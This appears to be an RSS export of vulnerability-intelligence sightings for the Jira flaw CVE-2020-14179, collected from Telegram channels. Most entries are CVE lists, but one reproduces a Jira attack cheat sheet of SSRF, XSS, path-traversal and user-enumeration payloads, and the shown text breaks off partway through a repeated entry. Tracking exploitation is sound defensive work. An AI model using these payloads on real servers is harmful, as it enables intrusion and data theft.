Most recent sightings.

Most recent sightings. https://db.gcve.eu Contains only the most 10 recent sightings. http://www.rssboard.org/rss-specification python-feedgen en Thu, 30 Apr 2026 08:59:51 +0000 2572f1c2-eddb-4cea-a3e2-a39dd1b51565 https://db.gcve.eu/sighting/2572f1c2-eddb-4cea-a3e2-a39dd1b51565/export {"uuid": "2572f1c2-eddb-4cea-a3e2-a39dd1b51565", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-14179", "type": "published-proof-of-concept", "source": "Telegram/vrn0DSLwtaTc_QH5If84nevKDZcnnFA-FkcxE0zYqqQ0cg", "content": "", "creation_timestamp": "2021-01-07T21:15:54.000000Z"} {"uuid": "2572f1c2-eddb-4cea-a3e2-a39dd1b51565", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-14179", "type": "published-proof-of-concept", "source": "Telegram/vrn0DSLwtaTc_QH5If84nevKDZcnnFA-FkcxE0zYqqQ0cg", "content": "", "creation_timestamp": "2021-01-07T21:15:54.000000Z"} https://db.gcve.eu/sighting/2572f1c2-eddb-4cea-a3e2-a39dd1b51565/export Thu, 07 Jan 2021 21:15:54 +0000 df18ef84-c835-43fe-84c4-410cb4dff9fb https://db.gcve.eu/sighting/df18ef84-c835-43fe-84c4-410cb4dff9fb/export {"uuid": "df18ef84-c835-43fe-84c4-410cb4dff9fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-14179", "type": "published-proof-of-concept", "source": "Telegram/b0JJXbd96Upato4epRlWZ7raWFaMpRJ-9ECijD9yWqUAJA", "content": "", "creation_timestamp": "2021-01-11T16:25:37.000000Z"} {"uuid": "df18ef84-c835-43fe-84c4-410cb4dff9fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-14179", "type": "published-proof-of-concept", "source": "Telegram/b0JJXbd96Upato4epRlWZ7raWFaMpRJ-9ECijD9yWqUAJA", "content": "", "creation_timestamp": "2021-01-11T16:25:37.000000Z"} https://db.gcve.eu/sighting/df18ef84-c835-43fe-84c4-410cb4dff9fb/export Mon, 11 Jan 2021 16:25:37 +0000 885bbdfe-56d8-477e-aada-b6b3da2c3ee5 https://db.gcve.eu/sighting/885bbdfe-56d8-477e-aada-b6b3da2c3ee5/export {"uuid": "885bbdfe-56d8-477e-aada-b6b3da2c3ee5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-14179", "type": "seen", "source": "https://t.me/ctinow/26964", "content": "U.S. Dept Of Defense: Sensitive data exposure via https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588/secure/QueryComponent!Default.jspa - CVE-2020-14179\n\nhttps://ift.tt/3qewyXt", "creation_timestamp": "2021-01-13T00:32:04.000000Z"} {"uuid": "885bbdfe-56d8-477e-aada-b6b3da2c3ee5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-14179", "type": "seen", "source": "https://t.me/ctinow/26964", "content": "U.S. Dept Of Defense: Sensitive data exposure via https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588/secure/QueryComponent!Default.jspa - CVE-2020-14179\n\nhttps://ift.tt/3qewyXt", "creation_timestamp": "2021-01-13T00:32:04.000000Z"} https://db.gcve.eu/sighting/885bbdfe-56d8-477e-aada-b6b3da2c3ee5/export Wed, 13 Jan 2021 00:32:04 +0000 def87190-524c-49c8-a81e-1f76d8cae603 https://db.gcve.eu/sighting/def87190-524c-49c8-a81e-1f76d8cae603/export {"uuid": "def87190-524c-49c8-a81e-1f76d8cae603", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-14179", "type": "published-proof-of-concept", "source": "https://t.me/infobes/305", "content": "#Analytics\n10 most exploited vulnerabilities of the week (march 22-28)\nCVE-2021-26855 - ProxyLogon MS Exchange Server RCE\nhttps://t.me/cybersecuritytechnologies/2835\nCVE-2021-22986/22987 - F5 BIG-IP TMM uri_normalize_host infoleak/out-of-bounds write\nhttps://t.me/cybersecuritytechnologies/2881\nCVE-2021-1732 - Windows kernel 0-day exploit\nhttps://t.me/cybersecuritytechnologies/2679\nCVE-2021-3449/3450 - OpenSSL DoS/certificate validation\nhttps://t.me/cybersecuritytechnologies/2993\nhttps://thehackernews.com/2021/03/openssl-releases-patches-for-2-high.html?m=1#click=https://t.co/z6FHjamuUy\nCVE-2021-26295 - Apache OFBiz unsafe deserialization\nhttps://t.me/cybersecuritytechnologies/2978\nCVE-2020-14179 - JIRA Information Disclosure\nhttps://t.me/cybersecuritytechnologies/2581\nCVE-2020-17453 - XSS In WSO2 Carbon Mgmnt Console\nhttps://t.me/cybersecuritytechnologies/3006\nCVE-2021-21087 - Adobe ColdFusion RCE\nhttps://www.bleepingcomputer.com/news/security/critical-code-execution-vulnerability-fixed-in-adobe-coldfusion", "creation_timestamp": "2021-03-29T03:08:41.000000Z"} {"uuid": "def87190-524c-49c8-a81e-1f76d8cae603", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-14179", "type": "published-proof-of-concept", "source": "https://t.me/infobes/305", "content": "#Analytics\n10 most exploited vulnerabilities of the week (march 22-28)\nCVE-2021-26855 - ProxyLogon MS Exchange Server RCE\nhttps://t.me/cybersecuritytechnologies/2835\nCVE-2021-22986/22987 - F5 BIG-IP TMM uri_normalize_host infoleak/out-of-bounds write\nhttps://t.me/cybersecuritytechnologies/2881\nCVE-2021-1732 - Windows kernel 0-day exploit\nhttps://t.me/cybersecuritytechnologies/2679\nCVE-2021-3449/3450 - OpenSSL DoS/certificate validation\nhttps://t.me/cybersecuritytechnologies/2993\nhttps://thehackernews.com/2021/03/openssl-releases-patches-for-2-high.html?m=1#click=https://t.co/z6FHjamuUy\nCVE-2021-26295 - Apache OFBiz unsafe deserialization\nhttps://t.me/cybersecuritytechnologies/2978\nCVE-2020-14179 - JIRA Information Disclosure\nhttps://t.me/cybersecuritytechnologies/2581\nCVE-2020-17453 - XSS In WSO2 Carbon Mgmnt Console\nhttps://t.me/cybersecuritytechnologies/3006\nCVE-2021-21087 - Adobe ColdFusion RCE\nhttps://www.bleepingcomputer.com/news/security/critical-code-execution-vulnerability-fixed-in-adobe-coldfusion", "creation_timestamp": "2021-03-29T03:08:41.000000Z"} https://db.gcve.eu/sighting/def87190-524c-49c8-a81e-1f76d8cae603/export Mon, 29 Mar 2021 03:08:41 +0000 f7941c8d-0451-4887-99fc-36782b0347f0 https://db.gcve.eu/sighting/f7941c8d-0451-4887-99fc-36782b0347f0/export {"uuid": "f7941c8d-0451-4887-99fc-36782b0347f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-14179", "type": "seen", "source": "https://t.me/true_secator/2035", "content": "\u200b\u200b\u0410\u0434\u043c\u0438\u043d\u0430\u043c \u043d\u0430 \u0437\u0430\u043c\u0435\u0442\u043a\u0443! \n\n\u0415\u0441\u043b\u0438 \u0432\u044b \u043d\u0435 \u0437\u043d\u0430\u043b\u0438 \u0447\u0435\u043c \u0441\u0435\u0431\u044f \u0437\u0430\u043d\u044f\u0442\u044c \u0432 \u0431\u043b\u0438\u0436\u0430\u0439\u0448\u0438\u0435 \u0431\u0443\u0434\u043d\u0438, \u0442\u043e \u0441\u0430\u043c\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u043f\u0440\u043e\u0432\u0435\u0441\u0442\u0438 \u0440\u0435\u0432\u0438\u0437\u0438\u044e \u0441\u0435\u0442\u0435\u0439 \u0441\u0432\u043e\u0435\u0439 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u044f \u0441\u0430\u043c\u044b\u0445 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c\u0438 Trend Micro \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u0430\u0440\u0441\u0435\u043d\u0430\u043b \u0445\u0430\u043a\u0435\u0440\u043e\u0432 \u0438\u0437 \u0422\u041e\u041f-15 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 Linux:\n\n- CVE-2017-9805: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043b\u0430\u0433\u0438\u043d\u0430 REST \u0434\u043b\u044f Apache Struts 2, XStream RCE.\n- CVE-2018-7600: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Drupal Core RCE.\n- CVE-2020-14750: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Oracle WebLogic Server RCE.\n- CVE-2020-25213: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c RCE \u043f\u043b\u0430\u0433\u0438\u043d\u0430 WordPress File Manager (wp-file-manager).\n- CVE-2020-17496: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c RCE \u0432 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0435 \u043f\u043e\u0434\u043b\u0438\u043d\u043d\u043e\u0441\u0442\u0438 \u0432 vBulletin subwidgetConfig\n- CVE-2020-11651: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u0431\u0430\u0433\u043e\u0432 \u0432 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 SaltStack Salt.\n- CVE-2017-12611: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c RCE \u0432 \u0432\u044b\u0440\u0430\u0436\u0435\u043d\u0438\u0438 OGNL \u0432 Apache Struts.\n- CVE-2017-7657: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u0446\u0435\u043b\u043e\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u043c \u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435\u043c \u0434\u043b\u0438\u043d\u044b \u0431\u043b\u043e\u043a\u0430 Eclipse Jetty.\n- CVE-2021-29441: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u0445\u043e\u0434\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 Alibaba Nacos AuthFilter.\n- CVE-2020-14179: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Atlassian Jira, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435\u043c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438.\n- CVE-2013-4547: Nginx \u0441\u043e\u0437\u0434\u0430\u043b \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u043b\u044f \u043e\u0431\u0445\u043e\u0434\u0430 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0432 \u0441\u0442\u0440\u043e\u043a\u0435 URI.\n- CVE-2019-0230: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Apache Struts 2 RCE.\n- CVE-2018-11776: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c RCE \u0432 \u0432\u044b\u0440\u0430\u0436\u0435\u043d\u0438\u0438 OGNL \u0432 Apache Struts.\n- CVE-2020-7961: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0435\u043d\u0430\u0434\u0435\u0436\u043d\u043e\u0439 \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 Liferay Portal.\n\n\u0420\u0430\u0431\u043e\u0442\u043d\u0435\u043c, \u043f\u043e\u0436\u0430\u043b\u0443\u0439.", "creation_timestamp": "2021-08-25T13:22:18.000000Z"} {"uuid": "f7941c8d-0451-4887-99fc-36782b0347f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-14179", "type": "seen", "source": "https://t.me/true_secator/2035", "content": "\u200b\u200b\u0410\u0434\u043c\u0438\u043d\u0430\u043c \u043d\u0430 \u0437\u0430\u043c\u0435\u0442\u043a\u0443! \n\n\u0415\u0441\u043b\u0438 \u0432\u044b \u043d\u0435 \u0437\u043d\u0430\u043b\u0438 \u0447\u0435\u043c \u0441\u0435\u0431\u044f \u0437\u0430\u043d\u044f\u0442\u044c \u0432 \u0431\u043b\u0438\u0436\u0430\u0439\u0448\u0438\u0435 \u0431\u0443\u0434\u043d\u0438, \u0442\u043e \u0441\u0430\u043c\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u043f\u0440\u043e\u0432\u0435\u0441\u0442\u0438 \u0440\u0435\u0432\u0438\u0437\u0438\u044e \u0441\u0435\u0442\u0435\u0439 \u0441\u0432\u043e\u0435\u0439 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u044f \u0441\u0430\u043c\u044b\u0445 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c\u0438 Trend Micro \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u0430\u0440\u0441\u0435\u043d\u0430\u043b \u0445\u0430\u043a\u0435\u0440\u043e\u0432 \u0438\u0437 \u0422\u041e\u041f-15 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 Linux:\n\n- CVE-2017-9805: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043b\u0430\u0433\u0438\u043d\u0430 REST \u0434\u043b\u044f Apache Struts 2, XStream RCE.\n- CVE-2018-7600: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Drupal Core RCE.\n- CVE-2020-14750: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Oracle WebLogic Server RCE.\n- CVE-2020-25213: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c RCE \u043f\u043b\u0430\u0433\u0438\u043d\u0430 WordPress File Manager (wp-file-manager).\n- CVE-2020-17496: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c RCE \u0432 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0435 \u043f\u043e\u0434\u043b\u0438\u043d\u043d\u043e\u0441\u0442\u0438 \u0432 vBulletin subwidgetConfig\n- CVE-2020-11651: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u0431\u0430\u0433\u043e\u0432 \u0432 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 SaltStack Salt.\n- CVE-2017-12611: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c RCE \u0432 \u0432\u044b\u0440\u0430\u0436\u0435\u043d\u0438\u0438 OGNL \u0432 Apache Struts.\n- CVE-2017-7657: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u0446\u0435\u043b\u043e\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u043c \u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435\u043c \u0434\u043b\u0438\u043d\u044b \u0431\u043b\u043e\u043a\u0430 Eclipse Jetty.\n- CVE-2021-29441: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u0445\u043e\u0434\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 Alibaba Nacos AuthFilter.\n- CVE-2020-14179: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Atlassian Jira, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435\u043c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438.\n- CVE-2013-4547: Nginx \u0441\u043e\u0437\u0434\u0430\u043b \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u043b\u044f \u043e\u0431\u0445\u043e\u0434\u0430 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0432 \u0441\u0442\u0440\u043e\u043a\u0435 URI.\n- CVE-2019-0230: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Apache Struts 2 RCE.\n- CVE-2018-11776: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c RCE \u0432 \u0432\u044b\u0440\u0430\u0436\u0435\u043d\u0438\u0438 OGNL \u0432 Apache Struts.\n- CVE-2020-7961: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0435\u043d\u0430\u0434\u0435\u0436\u043d\u043e\u0439 \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 Liferay Portal.\n\n\u0420\u0430\u0431\u043e\u0442\u043d\u0435\u043c, \u043f\u043e\u0436\u0430\u043b\u0443\u0439.", "creation_timestamp": "2021-08-25T13:22:18.000000Z"} https://db.gcve.eu/sighting/f7941c8d-0451-4887-99fc-36782b0347f0/export Wed, 25 Aug 2021 13:22:18 +0000 8401378e-73c2-45b1-a2e6-a01bd100b94f https://db.gcve.eu/sighting/8401378e-73c2-45b1-a2e6-a01bd100b94f/export {"uuid": "8401378e-73c2-45b1-a2e6-a01bd100b94f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-14179", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/3007", "content": "#Analytics\n10 most exploited vulnerabilities of the week (march 22-28)\nCVE-2021-26855 - ProxyLogon MS Exchange Server RCE\nhttps://t.me/cybersecuritytechnologies/2835\nCVE-2021-22986/22987 - F5 BIG-IP TMM uri_normalize_host infoleak/out-of-bounds write\nhttps://t.me/cybersecuritytechnologies/2881\nCVE-2021-1732 - Windows kernel 0-day exploit\nhttps://t.me/cybersecuritytechnologies/2679\nCVE-2021-3449/3450 - OpenSSL DoS/certificate validation\nhttps://t.me/cybersecuritytechnologies/2993\nhttps://thehackernews.com/2021/03/openssl-releases-patches-for-2-high.html\nCVE-2021-26295 - Apache OFBiz unsafe deserialization\nhttps://t.me/cybersecuritytechnologies/2978\nCVE-2020-14179 - JIRA Information Disclosure\nhttps://t.me/cybersecuritytechnologies/2581\nCVE-2020-17453 - XSS In WSO2 Carbon Mgmnt Console\nhttps://t.me/cybersecuritytechnologies/3006\nCVE-2021-21087 - Adobe ColdFusion RCE\nhttps://www.bleepingcomputer.com/news/security/critical-code-execution-vulnerability-fixed-in-adobe-coldfusion", "creation_timestamp": "2022-06-01T02:33:44.000000Z"} {"uuid": "8401378e-73c2-45b1-a2e6-a01bd100b94f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-14179", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/3007", "content": "#Analytics\n10 most exploited vulnerabilities of the week (march 22-28)\nCVE-2021-26855 - ProxyLogon MS Exchange Server RCE\nhttps://t.me/cybersecuritytechnologies/2835\nCVE-2021-22986/22987 - F5 BIG-IP TMM uri_normalize_host infoleak/out-of-bounds write\nhttps://t.me/cybersecuritytechnologies/2881\nCVE-2021-1732 - Windows kernel 0-day exploit\nhttps://t.me/cybersecuritytechnologies/2679\nCVE-2021-3449/3450 - OpenSSL DoS/certificate validation\nhttps://t.me/cybersecuritytechnologies/2993\nhttps://thehackernews.com/2021/03/openssl-releases-patches-for-2-high.html\nCVE-2021-26295 - Apache OFBiz unsafe deserialization\nhttps://t.me/cybersecuritytechnologies/2978\nCVE-2020-14179 - JIRA Information Disclosure\nhttps://t.me/cybersecuritytechnologies/2581\nCVE-2020-17453 - XSS In WSO2 Carbon Mgmnt Console\nhttps://t.me/cybersecuritytechnologies/3006\nCVE-2021-21087 - Adobe ColdFusion RCE\nhttps://www.bleepingcomputer.com/news/security/critical-code-execution-vulnerability-fixed-in-adobe-coldfusion", "creation_timestamp": "2022-06-01T02:33:44.000000Z"} https://db.gcve.eu/sighting/8401378e-73c2-45b1-a2e6-a01bd100b94f/export Wed, 01 Jun 2022 02:33:44 +0000 6043fb03-83c5-4e02-aa51-2c73483098c7 https://db.gcve.eu/sighting/6043fb03-83c5-4e02-aa51-2c73483098c7/export {"uuid": "6043fb03-83c5-4e02-aa51-2c73483098c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-14179", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/2793", "content": "CVE-2020-14179 - POC\n\nJira Server leads to information disclosure\n\nSteps to reproduce:-\n1. Visit https:///secure/QueryComponent!Default.jspa\n2. Information Disclosure about the custom Jira field names and custom SLA names.", "creation_timestamp": "2023-03-30T09:07:33.000000Z"} {"uuid": "6043fb03-83c5-4e02-aa51-2c73483098c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-14179", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/2793", "content": "CVE-2020-14179 - POC\n\nJira Server leads to information disclosure\n\nSteps to reproduce:-\n1. Visit https:///secure/QueryComponent!Default.jspa\n2. Information Disclosure about the custom Jira field names and custom SLA names.", "creation_timestamp": "2023-03-30T09:07:33.000000Z"} https://db.gcve.eu/sighting/6043fb03-83c5-4e02-aa51-2c73483098c7/export Thu, 30 Mar 2023 09:07:33 +0000 ff3e55e0-2287-4576-ad9f-83d2427ec089 https://db.gcve.eu/sighting/ff3e55e0-2287-4576-ad9f-83d2427ec089/export {"uuid": "ff3e55e0-2287-4576-ad9f-83d2427ec089", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-14179", "type": "published-proof-of-concept", "source": "https://t.me/lostsec/164", "content": "# Unauthenticated Jira CVEs\n1. CVE-2017-9506 (SSRF)\nhttps:///plugins/servlet/oauth/users/icon-uri?consumerUri=\n2. CVE-2018-20824 (XSS)\nhttps:///plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)\n3. CVE-2019-8451 (SSRF)\nhttps:///plugins/servlet/gadgets/makeRequest?url=https://:1337@example.com\n4. CVE-2019-8449 (User Information Disclosure)\nhttps:///rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true\n5. CVE-2019-8442 (Sensitive Information Disclosure)\nhttps:///s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n6. CVE-2019-3403 (User Enumeration)\nhttps:///rest/api/2/user/picker?query=\n7. CVE-2020-14181 (User Enumeration)\nhttps:///secure/ViewUserHover.jspa?username=\n8. CVE-2020-14178 (Project Key Enumeration)\nhttps:///browse.\n9. CVE-2020-14179 (Information Disclosure)\nhttps:///secure/QueryComponent!Default.jspa\n10. CVE-2019-11581 (Template Injection)\n/secure/ContactAdministrators!default.jspa\n\n* Try the SSTI Payloads\n11. CVE-2019-3396 (Path Traversal)\nPOST /rest/tinymce/1/macro/preview HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en-US,en;q=0.5 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\nReferer: {{Hostname}}\nContent-Length: 168\nConnection: close\n\n{\"contentId\":\"786457\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.viddler.com/v/23464dc5\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}\n\n*Try above request with the Jira target\n12. CVE-2019-3402 (XSS)\nhttps:///secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search\n/secure/ConfigurePortalPages!default.jspa?view=popular\n/secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false\n/secure/ContactAdministrators!default.jspa\n/servicedesk/customer/user/login\n/issues/?jql=\n/plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com\n/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true\n/plugins/servlet/gadgets/makeRequest?url=https://victomhost:1337@example.com\n/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)\n/secure/QueryComponent!Default.jspa\n/secure/ViewUserHover.jspa\n/ViewUserHover.jspa?username=Admin\n/rest/api/2/dashboard?maxResults=100\n/pages/%3CIFRAME%20SRC%3D%22javascript%3Aalert(\u2018XSS\u2019)%22%3E.vm\n/rest/api/2/user/picker?query=admin\n/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n/rest/api/2/user/picker?query=admin\n/s/\n/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.nl\n/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(1)%3C%2fscript%3Et1nmk&Search=Search\nConfigurePortalPages.jspa\n/plugins/servlet/Wallboard/?dashboardId=10100&dashboardId=10101&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=none&random=true\nREPORTS:- \nhttps://hackerone.com/reports/713900\nhttps://hackerone.com/reports/1103582\nhttps://hackerone.com/reports/380354\nhttps://hackerone.com/reports/197726\nhttps://hackerone.com/reports/632808", "creation_timestamp": "2024-03-18T07:23:33.000000Z"} {"uuid": "ff3e55e0-2287-4576-ad9f-83d2427ec089", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-14179", "type": "published-proof-of-concept", "source": "https://t.me/lostsec/164", "content": "# Unauthenticated Jira CVEs\n1. CVE-2017-9506 (SSRF)\nhttps:///plugins/servlet/oauth/users/icon-uri?consumerUri=\n2. CVE-2018-20824 (XSS)\nhttps:///plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)\n3. CVE-2019-8451 (SSRF)\nhttps:///plugins/servlet/gadgets/makeRequest?url=https://:1337@example.com\n4. CVE-2019-8449 (User Information Disclosure)\nhttps:///rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true\n5. CVE-2019-8442 (Sensitive Information Disclosure)\nhttps:///s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml\n6. CVE-2019-3403 (User Enumeration)\nhttps:///rest/api/2/user/picker?query=\n7. CVE-2020-14181 (User Enumeration)\nhttps:///secure/ViewUserHover.jspa?username=\n8. CVE-2020-14178 (Project Key Enumeration)\nhttps:///browse.\n9. CVE-2020-14179 (Information Disclosure)\nhttps:///secure/QueryComponent!Default.jspa\n10. CVE-2019-11581 (Template Injection)\n/secure/ContactAdministrators!default.jspa\n\n* Try 